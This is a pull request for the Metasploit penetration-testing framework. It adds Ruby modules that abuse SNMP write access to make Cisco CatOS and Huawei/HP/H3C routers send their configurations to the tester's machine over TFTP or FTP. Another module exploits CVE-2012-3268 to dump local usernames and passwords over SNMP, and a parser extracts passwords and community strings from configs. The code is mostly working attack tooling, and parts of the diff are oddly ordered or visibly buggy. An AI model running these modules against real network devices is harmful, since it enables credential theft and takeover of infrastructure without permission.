### PR TITLE
Addition for Huawei/HP/H3C and Cisco router updates

### DIFF
--- a/lib/msf/core/auxiliary/cisco.rb
+++ b/lib/msf/core/auxiliary/cisco.rb
@@ -1,3 +1,4 @@
+-# -*- coding: binary -*-
 module Msf
 
 ###

--- a/lib/msf/core/auxiliary/hh3c.rb
+++ b/lib/msf/core/auxiliary/hh3c.rb
@@ -56,7 +56,7 @@ module Auxiliary::HH3C
 					confhash['uname'] = ""
 					confhash['level'] = ""
 
-				when /^\ssuper password level (\d) (simple|cipher) (.*)/i
+				when /^\s*super password level (\d) (simple|cipher) (.*)/i
 					# super password
 					level = $1
 					pwtype = $2

--- a/lib/msf/core/auxiliary/hh3c.rb
+++ b/lib/msf/core/auxiliary/hh3c.rb
@@ -1,0 +1,121 @@
+# -*- coding: binary -*-
+module Msf
+
+###
+#
+# This module provides methods for working with Huawei/HP/H3C equipment
+#
+# Currently is supports only the basic locally configured users, super
+# password and SNMP community strings.
+#
+###
+
+module Auxiliary::HH3C
+	include Msf::Auxiliary::Report
+
+	def h3c_config_eater(thost, tport, config)
+
+		#
+		# Create a template hash for cred reporting
+		#
+		cred_info = {
+			:host  => thost,
+			:port  => tport,
+			:user  => "",
+			:pass  => "",
+			:type  => "",
+			:collect_type => "",
+			:active => true
+		}
+
+		# Default SNMP to UDP
+		if tport == 161
+			cred_info[:proto] = 'udp'
+		end
+
+		store_loot("hh3c.config", "text/plain", thost, config.strip, "config.txt", "Huawei/H3C Configuration")
+
+		# since configuration sections span multiple lines we use a hash
+		# to keep track of what we're looking for:
+		#   sect = { local-user, con, vty }
+		#   uname = "username"
+		#   level = { 0, 1, 2, 3 }
+		# some commands are single-line like routing auth, vpn, etc
+
+		confhash = {
+			:sect => "",
+			:uname => "",
+			:level => "",
+		}
+
+		config.each_line do |line|
+			case line
+				when /^#/i
+					# comment / end of section
+					confhash['sect'] = ""
+					confhash['uname'] = ""
+					confhash['level'] = ""
+
+				when /^\ssuper password level (\d) (simple|cipher) (.*)/i
+					# super password
+					level = $1
+					pwtype = $2
+					pwval = $3.strip
+
+					print_good("#{thost}:#{tport} super-password: #{pwval}")
+					cred = cred_info.dup
+					cred[:pass] = pwval
+					cred[:type] = "password"
+					cred[:collect_type] = "password"
+					store_cred(cred)
+
+				when /^local user (.*)/i
+					# local-users section
+					confhash['sect'] = 'local-user'
+					confhash['uname'] = $2.strip
+
+				when /^\suser-interface (con|vty) (.*)/i
+					# console/vty password section
+					confhash['sect'] = $1.strip
+					confhash['uname'] = ""
+
+				when /^\spassword (simple|cipher|sha256) (.*)/i
+					# an actual password entry, could be in multiple sections
+					pwtype = $1
+					pwval = $2.strip
+
+					print_good("#{thost}:#{tport} Local user: #{confhash['uname']} password: #{pwval}")
+					cred = cred_info.dup
+					cred[:user] = confhash['uname']
+					cred[:pass] = pwval
+					cred[:type] = "password"
+					cred[:collect_type] = "password"
+					store_cred(cred)
+
+				# SNMP community strings
+				when /^\ssnmp-agent community (read|write) (.*)/i
+					stype = $1.strip
+					scomm = $2.strip
+					print_good("#{thost}:#{tport} SNMP Community (#{stype}): #{scomm}")
+
+					if stype.downcase == "read"
+						ptype = "password_ro"
+					else
+						ptype = "password"
+					end
+
+					cred = cred_info.dup
+					cred[:sname] = "snmp"
+					cred[:pass] = scomm
+					cred[:type] = ptype
+					cred[:collect_type] = ptype
+					cred[:proto] = "udp"
+					cred[:port]  = 161
+					store_cred(cred)
+
+			end
+		end
+	end
+
+end
+end

--- a/modules/auxiliary/scanner/snmp/cisco_catos_config_tftp.rb
+++ b/modules/auxiliary/scanner/snmp/cisco_catos_config_tftp.rb
@@ -1,0 +1,146 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::SNMPClient
+	include Msf::Auxiliary::Cisco
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name'        => 'Cisco CatOS SNMP Configuration Grabber (TFTP)',
+			'Description' => %q{
+					This module will download the startup or running configuration
+				from a Cisco CatOS device using SNMP and TFTP. A read-write SNMP
+				community is required. The SNMP community scanner module can
+				assist in identifying a read-write community. The target must
+				be able to connect back to the Metasploit system and the use of
+				NAT will cause the TFTP transfer to fail.
+			},
+			'Author'      =>
+				[
+					'pello <fropert[at]packetfault.org>', 'hdm', 'Kurt Grutzmacher <grutz@jingojango.net>'
+				],
+			'References'  =>
+			[
+				[ 'URL', 'http://www.cisco.com/en/US/tech/tk648/tk362/technologies_tech_note09186a0080094aa3.shtml#topic1' ],
+			],
+			'License'     => MSF_LICENSE
+		)
+		register_options([
+			OptEnum.new("SUPMOD", [true, "Which supervisor module, (1) or (2)?", "1", ["1", "2"]]),
+			OptString.new('OUTPUTDIR', [ false, "The directory where we should save the configuration files (disabled by default)"]),
+			OptAddress.new('LHOST', [ false, "The IP address of the system running this module" ])
+		], self.class)
+	end
+
+
+	#
+	# Start the TFTP Server
+	#
+	def setup
+		# Setup is called only once
+		print_status("Starting TFTP server...")
+		@tftp = Rex::Proto::TFTP::Server.new(69, '0.0.0.0', { 'Msf' => framework, 'MsfExploit' => self })
+		@tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
+		@tftp.start
+		add_socket(@tftp.sock)
+
+		@main_thread = ::Thread.current
+
+		print_status("Scanning for vulnerable targets...")
+	end
+
+	#
+	# Kill the TFTP server
+	#
+	def cleanup
+		# Cleanup is called once for every single thread
+		if ::Thread.current == @main_thread
+			# Wait 5 seconds for background transfers to complete
+			print_status("Providing some time for transfers to complete...")
+			::IO.select(nil, nil, nil, 5.0)
+
+			print_status("Shutting down the TFTP service...")
+			if @tftp
+				@tftp.close rescue nil
+				@tftp = nil
+			end
+		end
+	end
+
+	#
+	# Callback for incoming files
+	#
+	def process_incoming(info)
+		return if not info[:file]
+		name = info[:file][:name]
+		data = info[:file][:data]
+		from = info[:from]
+		return if not (name and data)
+
+		# Trim off IPv6 mapped IPv4 if necessary
+		from = from[0].dup
+		from.gsub!('::ffff:', '')
+
+		print_status("Incoming file from #{from} - #{name} #{data.length} bytes")
+
+		# Save the configuration file if a path is specified
+		if datastore['OUTPUTDIR']
+			name = "#{from}.txt"
+			::FileUtils.mkdir_p(datastore['OUTPUTDIR'])
+			path = ::File.join(datastore['OUTPUTDIR'], name)
+			::File.open(path, "wb") do |fd|
+				fd.write(data)
+			end
+			print_status("Saved configuration file to #{path}")
+		end
+
+		# Toss the configuration file to the parser
+		cisco_ios_config_eater(from, 161, data)
+	end
+
+	def run_host(ip)
+
+		begin
+			source   = datastore['SOURCE'].to_i
+			protocol = 1
+			filename = "#{ip}.txt"
+			lhost    = datastore['LHOST'] || Rex::Socket.source_address(ip)
+			supmod   = datastore['SUPMOD'].to_i || 1
+
+			cccopyserveraddress  = "1.3.6.1.4.1.9.5.1.5.1."
+			cccopyfilename       = "1.3.6.1.4.1.9.5.1.5.2."
+			ccsupervisormodule   = "1.3.6.1.4.1.9.5.1.5.3."
+			ccaction             = "1.3.6.1.4.1.9.5.1.5.4."
+
+			session = rand(255) + 1
+
+			snmp = connect_snmp
+
+			print_status("Trying to acquire configuration from #{ip}...")
+
+			varbind = SNMP::VarBind.new("#{cccopyserveraddress}#{session}", SNMP::IpAddress.new(lhost))
+			value = snmp.set(varbind)
+
+			varbind = SNMP::VarBind.new("#{cccopyfilename}#{session}", SNMP::OctetString.new(filename))
+			value = snmp.set(varbind)
+
+			varbind = SNMP::VarBind.new("#{ccsupervisormodule}#{session}", SNMP::Integer.new(supmod))
+			value = snmp.set(varbind)
+
+			varbind = SNMP::VarBind.new("#{ccaction}#{session}", SNMP::Integer.new(3))
+			value = snmp.set(varbind)
+
+			disconnect_snmp
+
+		# No need to make noise about timeouts
+		rescue ::SNMP::RequestTimeout, ::Rex::ConnectionRefused
+		rescue ::Interrupt
+			raise $!
+		rescue ::Exception => e
+			print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")
+		end
+	end
+
+end

--- a/modules/auxiliary/scanner/snmp/hh3c_config.rb
+++ b/modules/auxiliary/scanner/snmp/hh3c_config.rb
@@ -1,0 +1,210 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::SNMPClient
+	include Msf::Auxiliary::HH3C
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name'		=> 'Huawei/HP/3H3C SNMP Configuration Grabber',
+			'Description' => %q{
+				This module will download the startup or running configuration
+				from a Huawei or HP/H3C device using SNMP and TFTP or FTP. A
+				read-write SNMP community is required.
+
+				If you want Metasplot to process the received files the target
+				must be able to connect back to the Metasploit system. The use of
+				NAT will cause the transfer to fail.
+			},
+			'Author'	  =>
+				[
+					'pello <fropert[at]packetfault.org>', 'hdm', 'Kurt Grutzmacher <grutz[at]jingojango.net>'
+				],
+			'References'  =>
+			[
+				[ 'URL', 'http://www.h3c.com/portal/Products___Solutions/Technology/System_Management/Configuration_Example/200912/656452_57_0.htm' ],
+			],
+			'License'	 => MSF_LICENSE
+			)
+
+			register_options([
+				OptEnum.new("OPTYPE", [true, "Grab the startup (6) or running (3) configuration", "3", ["3","6"]]),
+				OptString.new('OUTPUTDIR', [ false, "The directory where we should save the configuration files (disabled by default)"]),
+				OptAddress.new('LHOST', [ false, "The IP address of the system running this module" ]),
+				OptString.new('RUNTFTPD', [true, "Start the TFTP server", "true", ["true", "false"]]),
+				OptString.new('CLEARSNMP', [true, "Remove the SNMP entries (if successful)", "true", ["true", "false"]]),
+				OptString.new('MIBSTYLE', [true, "Use the new or old style MIB (h3c vs hh3c)", "new", ["new", "old"]]),
+				OptString.new('FTPUSER', [false, "FTP username, if enabled will not start TFTP"]),
+				OptString.new('FTPPASS', [false, "FTP password"]),
+			], self.class)
+	end
+
+
+	#
+	# Start the TFTP Server
+	#
+	def setup
+		# Setup is called only once
+
+		if datastore['FTPUSER']
+			print_debug('FTPUSER set, not starting TFTP server')
+			@start_tftp = false
+		else
+			@start_tftp = datastore['RUNTFTPD']
+		end
+
+		if @start_tftp
+			print_status("Starting TFTP server...")
+			@tftp = Rex::Proto::TFTP::Server.new(69, '0.0.0.0', { 'Msf' => framework, 'MsfExploit' => self })
+			@tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
+			@tftp.start
+			add_socket(@tftp.sock)
+		end
+
+		@main_thread = ::Thread.current
+
+		print_status("Scanning for vulnerable targets...")
+	end
+
+	#
+	# Kill the TFTP server
+	#
+	def cleanup
+		# Cleanup is called once for every single thread
+		if @start_tftp
+			if ::Thread.current == @main_thread
+				# Wait 5 seconds for background transfers to complete
+				print_status("Providing some time for transfers to complete...")
+				Rex::ThreadSafe.sleep(5)
+
+				print_status("Shutting down the TFTP service...")
+				if @tftp
+					@tftp.close rescue nil
+					@tftp = nil
+				end
+			end
+		end
+	end
+
+	#
+	# Callback for incoming files
+	#
+	def process_incoming(info)
+		return if not info[:file]
+		name = info[:file][:name]
+		data = info[:file][:data]
+		from = info[:from]
+		return if not (name and data)
+
+		# Trim off IPv6 mapped IPv4 if necessary
+		from = from[0].dup
+		from.gsub!('::ffff:', '')
+
+		print_status("Incoming file from #{from} - #{name} #{data.length} bytes")
+
+		# Save the configuration file if a path is specified
+		if datastore['OUTPUTDIR']
+			name = "#{from}.txt"
+			::FileUtils.mkdir_p(datastore['OUTPUTDIR'])
+			path = ::File.join(datastore['OUTPUTDIR'], name)
+			::File.open(path, "wb") do |fd|
+				fd.write(data)
+			end
+			print_status("Saved configuration file to #{path}")
+		end
+
+		# Toss the configuration file to the parser
+		hh3c_config_eater(from, 161, data)
+	end
+
+	def run_host(ip)
+
+		begin
+			if datastore['FTPUSER'] != ''
+				protocol = 1
+			else
+				protocol = 2  # TFTP
+			end
+
+			optype   = datastore['OPTYPE'].to_i
+			filename = "#{ip}.txt"
+			lhost	= datastore['LHOST'] || Rex::Socket.source_address(ip)
+
+			if datastore['MIBSTYLE'] == "new"
+				# newstyle
+				hh3cCfgOperateType			= "1.3.6.1.4.1.25506.2.4.1.2.4.1.2."
+				hh3cCfgOperateProtocol		= "1.3.6.1.4.1.25506.2.4.1.2.4.1.3."
+				hh3cCfgOperateFileName		= "1.3.6.1.4.1.25506.2.4.1.2.4.1.4."
+				hh3cCfgOperateServerAddress = "1.3.6.1.4.1.25506.2.4.1.2.4.1.5."
+				hh3cCfgOperateUserName		= "1.3.6.1.4.1.25506.2.4.1.2.4.1.6."
+				hh3cCfgOperateUserPassword  = "1.3.6.1.4.1.25506.2.4.1.2.4.1.7."
+				hh3cCfgOperateRowStatus		= "1.3.6.1.4.1.25506.2.4.1.2.4.1.9."
+			else
+				# oldstyle
+				hh3cCfgOperateType			= "1.3.6.1.4.1.2011.10.2.4.1.2.4.1.2."
+				hh3cCfgOperateProtocol		= "1.3.6.1.4.1.2011.10.2.4.1.2.4.1.3."
+				hh3cCfgOperateFileName		= "1.3.6.1.4.1.2011.10.2.4.1.2.4.1.4."
+				hh3cCfgOperateServerAddress = "1.3.6.1.4.1.2011.10.2.4.1.2.4.1.5."
+				hh3cCfgOperateUserName		= "1.3.6.1.4.1.2011.10.2.4.1.2.4.1.6."
+				hh3cCfgOperateUserPassword  = "1.3.6.1.4.1.2011.10.2.4.1.2.4.1.7."
+				hh3cCfgOperateRowStatus		= "1.3.6.1.4.1.2011.10.2.4.1.2.4.1.9."
+			end
+
+			session = rand(255) + 1
+
+			snmp = connect_snmp
+
+			print_status("Attempting to acquire configuration from #{ip}...")
+
+			vbl = [
+				SNMP::VarBind.new("#{hh3cCfgOperateType}#{session}" , SNMP::Integer.new(optype.to_i)),
+				SNMP::VarBind.new("#{hh3cCfgOperateProtocol}#{session}" , SNMP::Integer.new(protocol.to_i)),
+				SNMP::VarBind.new("#{hh3cCfgOperateFileName}#{session}", SNMP::OctetString.new(filename)),
+				SNMP::VarBind.new("#{hh3cCfgOperateServerAddress}#{session}", SNMP::IpAddress.new(lhost))
+			]
+
+			if datastore['FTPUSER']
+				vbl << SNMP::VarBind.new("#{hh3cCfgOperateUserName}#{session}", SNMP::OctetString.new(datastore['FTPUSER']))
+				vbl << SNMP::VarBind.new("#{hh3cCfgOperateUserPassword}#{session}", SNMP::OctetString.new(datastore['FTPPASS']))
+			end
+
+			vbl << SNMP::VarBind.new("#{hh3cCfgOperateRowStatus}#{session}", SNMP::Integer.new(4))
+			varbind = SNMP::VarBindList.new(vbl)
+			value = snmp.set(varbind)
+
+			# cleanup
+			if datastore['CLEARSNMP']
+				print_debug("Waiting 10 seconds before clearing")
+				Rex::ThreadSafe.sleep(10)
+				varbind = SNMP::VarBind.new("#{hh3cCfgOperateRowStatus}#{session}", SNMP::Integer.new(6))
+				value = snmp.set(varbind)
+			end
+
+			disconnect_snmp
+
+		rescue ::SNMP::RequestTimeout, ::Rex::ConnectionRefused
+		rescue ::Interrupt
+			raise $!
+		rescue ::Exception => e
+			print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")
+		end
+	end
+
+end
+
+=begin
+http://www.h3c.com/portal/Products___Solutions/Technology/System_Management/Configuration_Example/200912/656452_57_0.htm#_Toc247357228
+
+For a node in the H3C new-style MIB files, its name starts with hh3c,
+and its OID starts with 1.3.6.1.4.1.25506; for a node in the H3C
+compatible-style MIB files, its name starts with h3c, and its OID starts
+with 1.3.6.1.4.1.2011.10. For example, node hh3cCfgOperateType with the
+OID of 1.3.6.1.4.1.25506.2.4.1.2.4.1.2 is in file hh3c-config-man.mib, and
+node h3cCfgOperateType with the OID of 1.3.6.1.4.1.2011.10.2.4.1.2.4.1.2
+is in file h3c-config-man.mib. Both of the two nodes indicate the same
+variable in the agent, but they are in different MIB style.
+
+By default, devices use H3C new-style MIB files;
+=end

--- a/modules/auxiliary/scanner/snmp/hh3c_localuser_enum.rb
+++ b/modules/auxiliary/scanner/snmp/hh3c_localuser_enum.rb
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary
 			rescue Errno::ECONNREFUSED
 				print_status("#{ip}, Connection refused.")
 			rescue SNMP::InvalidIpAddress
-				print_status("#{ip}, Invalid Ip Address. Check it with 'snmpwalk tool'.")
+				print_status("#{ip}, Invalid IP Address. Check it with 'snmpwalk tool'.")
 			rescue SNMP::UnsupportedVersion
 				print_status("Unsupported SNMP version specified. Select from '1' or '2c'.")
 			rescue ::Interrupt

--- a/modules/auxiliary/scanner/snmp/hh3c_localuser_enum.rb
+++ b/modules/auxiliary/scanner/snmp/hh3c_localuser_enum.rb
@@ -1,0 +1,112 @@
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::SNMPClient
+	include Msf::Auxiliary::Report
+	include Msf::Auxiliary::Scanner
+
+	def initialize
+		super(
+			'Name'		=> 'Huawei/H3C SNMP Login Credential Grabber',
+			'Description' => %q{
+				This module will obtain the username and password/cipher from
+				an HP/H3C or Huawei device via SNMP. A valid SNMP community
+				string is required. Prior to Oct 2012 this could be the
+				read-only string.
+			},
+			'Author'	  => [ 'Kurt Grutzmacher <grutz[at]jingojango.net>' ],
+			'License'	 => MSF_LICENSE,
+			'References'  =>
+			[
+				[ 'URL', 'http://grutztopia.jingojango.net/2012/10/hph3c-and-huawei-snmp-weak-access-to.html' ],
+				[ 'URL', 'https://h20565.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03515685&ac.admitted=1350939600802.876444892.492883150' ],
+				[ 'CVE', '2012-3268' ],
+				[ 'US-CERT-VU', '225404' ],
+			],
+			)
+		end
+
+		def run_host(ip)
+			begin
+				snmp = connect_snmp
+
+				user_tbl_h3c = [
+					"1.3.6.1.4.1.2011.10.2.12.1.1.1.1",  # h3cUserName
+					"1.3.6.1.4.1.2011.10.2.12.1.1.1.2",  # h3cUserPassword
+					"1.3.6.1.4.1.2011.10.2.12.1.1.1.3",  # h3cAuthMode
+					"1.3.6.1.4.1.2011.10.2.12.1.1.1.4",  # h3cUserLevel
+					"1.3.6.1.4.1.2011.10.2.12.1.1.1.5",  # h3cUserState
+				]
+
+				user_tbl_hh3c = [
+					"1.3.6.1.4.1.25506.2.12.1.1.1.1",  # hh3cUserName
+					"1.3.6.1.4.1.25506.2.12.1.1.1.2",  # hh3cUserPassword
+					"1.3.6.1.4.1.25506.2.12.1.1.1.3",  # hh3cAuthMode
+					"1.3.6.1.4.1.25506.2.12.1.1.1.4",  # hh3cUserLevel
+					"1.3.6.1.4.1.25506.2.12.1.1.1.5",  # hh3cUserState
+				]
+
+				@users = []
+				sysdescr = snmp.get_value('sysDescr.0')
+				if sysdescr =~ /H3C|Huawei/i
+					snmp.walk(user_tbl_h3c) do |row|
+						@users << row.collect{|x|x.value}
+					end
+					if @users.nil?
+						# No users? Lets try hh3c (25506) instead of h3c
+						# (2011.10)
+						user_new = []
+						snmp.walk(user_tbl_hh3c) do |row|
+							@user << row.collection{|x|x.value}
+						end
+					end
+				else
+					print_good("#{ip} is not an H3C or Huawei device. SNMP reports: #{sysdescr}")
+				end
+
+				disconnect_snmp
+
+				if not @users.empty?
+					tbl  = Rex::Ui::Text::Table.new(
+						'Header'  => 'Huawei/H3C Device Logins',
+						'Indent'  => 1,
+						'Columns' => ['IP Address', 'Username', 'Password/Cipher', 'Auth Mode', 'User Level', 'User State']
+					)
+					@users.map{ |user|
+						tbl << [ip, user[0], user[1], user[2], user[3], user[4]]
+						report_auth_info(
+							:host  => ip,
+							:port  => '161',
+							:sname => 'snmp',
+							:user  => user[0],
+							:pass  => user[1],
+							:type  => "hh3c_logins"
+						)
+					}
+					store_loot(
+						'host.hh3c.users',
+						'text/plain',
+						ip,
+						tbl.to_csv,
+						"#{ip}_huawei_h3c_users.txt",
+						"Huawei/H3C Users/Passwords"
+					)
+					print_good(tbl.to_s)
+				end
+			rescue SNMP::RequestTimeout
+				vprint_status("#{ip}, SNMP request timeout.")
+			rescue Errno::ECONNREFUSED
+				print_status("#{ip}, Connection refused.")
+			rescue SNMP::InvalidIpAddress
+				print_status("#{ip}, Invalid Ip Address. Check it with 'snmpwalk tool'.")
+			rescue SNMP::UnsupportedVersion
+				print_status("Unsupported SNMP version specified. Select from '1' or '2c'.")
+			rescue ::Interrupt
+				raise $!
+			rescue ::Exception => e
+				print_status("Unknown error: #{e.class} #{e}")
+			end
+	end
+
+end


### PR DESCRIPTION
First off this update adds some additional Cisco configuration
support to the config_ios_eater() function.

Secondly the ability to download old Cisco CatOS configurations
has been added.

Third this adds support for Huawei/H3C configuration d/l via
FTP or TFTP. Users can enable/disable the TFTP server which will
not then call hh3c_config_eater() because we have no way to know
where the configuration file went to.

The hh3c_config module has not been fully tested! The gear I had
access to was very flaky in its support for accepting the SNMP
sets correctly. As soon as I can get my hands on more gear I'll
test and improve the module (or if somebody else can... that's
good).

The hh3c_localuser_enum scanner will take an SNMP community string
and attempt to enumerate locally configured users. For the longest
time this access only required read-only access.
